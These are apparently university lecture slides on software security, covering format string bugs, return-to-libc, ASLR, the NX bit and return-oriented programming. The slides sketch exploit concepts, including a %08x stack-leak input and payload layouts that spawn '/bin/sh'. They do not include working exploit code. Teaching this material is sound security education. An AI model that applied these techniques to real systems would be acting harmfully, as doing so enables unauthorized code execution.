CSC 495/583 Topics of Software Security Return-oriented programming Class8 CSC 495/583 Topics of Software Security Return-oriented programming (ROP) Dr. Si Chen (schen@wcupa.edu)
Review
Format String Bug
Format String Bug What is a Format String? A Format String is an ASCII string that contains text and format parameters printf("%s %d\n", str, a); fprintf(stderr, "%s %d\n", str, a); sprintf(buffer, "%s %d\n", str, a); E.g. My name is Chen
Format String Bug The wrong way…
Example: fmt_wrong.c
Example: fmt_wrong.c %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x.%08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. %08x. the argument is passed directly to the “printf” function. the function didn’t find a corresponding variable or value on stack so it will start popping values off the stack
Advanced Usage: Format String Direct Access
What is this BUG used for? Disclose sensitive information: Variable(s) EBP value The correct location for putting Shellcode
What is this BUG used for? Disclose StackGuard Canary: By pass stack checking
What is this BUG used for? Read data in any memory address: %s to read data in an arbitrary memory address Write data in any memory address: printf not only allows you to read but also write %n
What is this BUG used for? Disclose Library Address When enable ASLR, the library address will change each time It’s impossible to call these functions in your shellcode (e.g. system()) Use this bug to disclose one function’s address in a given library. you can use it to deduce other function’s address
What is this BUG used for? Disclose Library Address When enable ASLR, the library address will change each time It’s impossible to call these functions in your shellcode (e.g. system()) Use this bug to disclose one function’s address in a given library. you can use it to deduce other function’s address
ELF executable
ELF executable for Linux Executable and Linkable Format (ELF) Linux Windows ELF file .exe (PE) .so (Shared object file) .dll (Dynamic Linking Library) .a .lib (static linking library) .o (intermediate file between complication and linking, object file) .obj
ELF executable for Linux ELF32-bit LSB Dynamically linked
Shared library ELF is loaded by ld-linux.so.2 in charge of memory mapping, load shared library etc.. You can call functions in libc.so.6
Return-oriented programming (ROP)
“Bad” behavior “Good” behavior Attacker code Application code Bad code versus bad behavior “Bad” behavior “Good” behavior Attacker code Application code Problem: this implication is false!
Return-oriented programming thesis any sufficiently large program codebase arbitrary attacker computation and behavior, without code injection (in the absence of control-flow integrity)
Traditional Stack Overflow NOP Sled Payload Saved EIP
Traditional Stack Overflow The simplest stack overflow exploit operates as follows: Send a payload with a NOP sled, shellcodem, and a pointer to the NOP sled The pointer to the NOP sled overwrites the saved return address and thereby takes over the stored EIP EIP now points to the machine code and the program executes arbitrary code
Industry response to code injection exploits Marks all writeable locations in a process’ address space as nonexecutable Deployment: Linux (via PaX patches); OpenBSD; Windows (since XP SP2); OS X (since 10.5); … Hardware support: Intel “XD” bit,AMD “NX” bit (and many RISC processors)
Traditional Stack Overflow Pros Very easy to trigger Simple to understand Being able to inject code means our payloads are powerful and flexible Cons Just make the stack non-‐executable Lots of problems with bad characters, buffer sizes, payload detection, etc.
Return-to-libc Padding system() exit() “/bin/sh”
Return-to-libc Used primarily to streamline exploitation to bypass mitigation and situational limitations We want to spawn a shell. Send a payload that overwrites the saved EIP with the address of system(), the address of exit(), and a pointer to “/bin/sh” The system call will return directly to exit() which will then shut down the program cleanly
Return-to-libc Divert control flow of exploited program into libc code system(), printf(), … No code injection required Perception of return-into-libc: limited, easy to defeat Attacker cannot execute arbitrary code Attacker relies on contents of libc — remove system()?
Return-to-libc Pros ▫ Does not need executable stack ▫ Also pretty easy to understand and implement Cons ▫ Relies on access to library functions ▫ Can only execute sequential instructions, no branching or fancy stuff ▫ Can only use code in .text and loaded libraries
Mitigation against these classical attacks attacks Address Space Layout Randomization (ASLR) No execute bit
Address Space Layout Randomization (ASLR) Map your Heap and Stack randomly At each execution, your Heap and Stack will be mapped at different places It's the same for shared libraries So, now you cannot jump on an hardened address like in a classical attack
Address Space Layout Randomization (ASLR) Three executions of the same binary :
Data Execution Prevention (DEP): No eXecute bit (NX) NX bit is a CPU feature – On Intel CPU, it works only on x86_64 or with Physical Address Extension (PAE) enable Enabled, it raises an exception if the CPU tries to execute something that doesn't have the NX bit set The NX bit is located and setup in the Page Table Entry
Page Table Each process in a multi-tasking OS runs in its own memory sandbox. This sandbox is the virtual address space, which in 32-bit mode is always a 4GB block of memory addresses. These virtual addresses are mapped to physical memory by page tables, which are maintained by the operating system kernel and consulted by the processor. Each process has its own set of page tables.
Page Table To each virtual page there corresponds one page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record shown below:
Data Execution Prevention (DEP): No eXecute bit (NX) The last bit is the NX bit (exb) ● – 0 = disabled 1 = enabled –
Return-Oriented Programming: Exploits Without Code Injection ROP Introduction When Good Instructions Go Bad: Generalizing Return-Oriented Programming to RISC [1] -Buchanan, E.; Roemer, R.; Shacham, H.; Savage, S. (October 2008) ● Return-Oriented Programming: Exploits Without Code Injection [2] - Shacham, Hovav; Buchanan, Erik; Roemer, Ryan; Savage, Stefan. Retrieved 2009-08-12. ●
Ordinary programming: the machine level insn instruction pointer Instruction pointer (%eip) determines which instruction to fetch & execute Once processor has executed the instruction, it automatically increments %eip to next instruction Control flow by changing value of %eip
Return-oriented programming: the machine level insns … ret insns … ret C library insns … ret insns … ret insns … ret stack pointer Stack pointer (%esp) determines which instruction sequence to fetch & execute Processor doesn’t automatically increment %esp; — but the “ret” at end of each instruction sequence does
ROP: The Main Idea
ROP Gadget “The Gadget”: July 1945
Attack Process on x86 So, the real execution is: Gadget1 is executed and returns Gadget2 is executed and returns Gadget3 is executed and returns So, the real execution is: ●
Several ways to find gadgets How can we find gadgets? Several ways to find gadgets Old school method : objdump and grep Some gadgets will be not found: objdump aligns instructions Make your own tool which scans an executable segment Use an existing tool
Finding instruction sequences Any instruction sequence ending in “ret” is useful — could be part of a gadget Algorithmic problem: recover all sequences of valid instructions from libc that end in a “ret” insn Idea: at each ret (c3 byte) look back: are preceding i bytes a valid length-i insn? recurse from found instructions Collect instruction sequences in a trie
ROPgadget
Q & A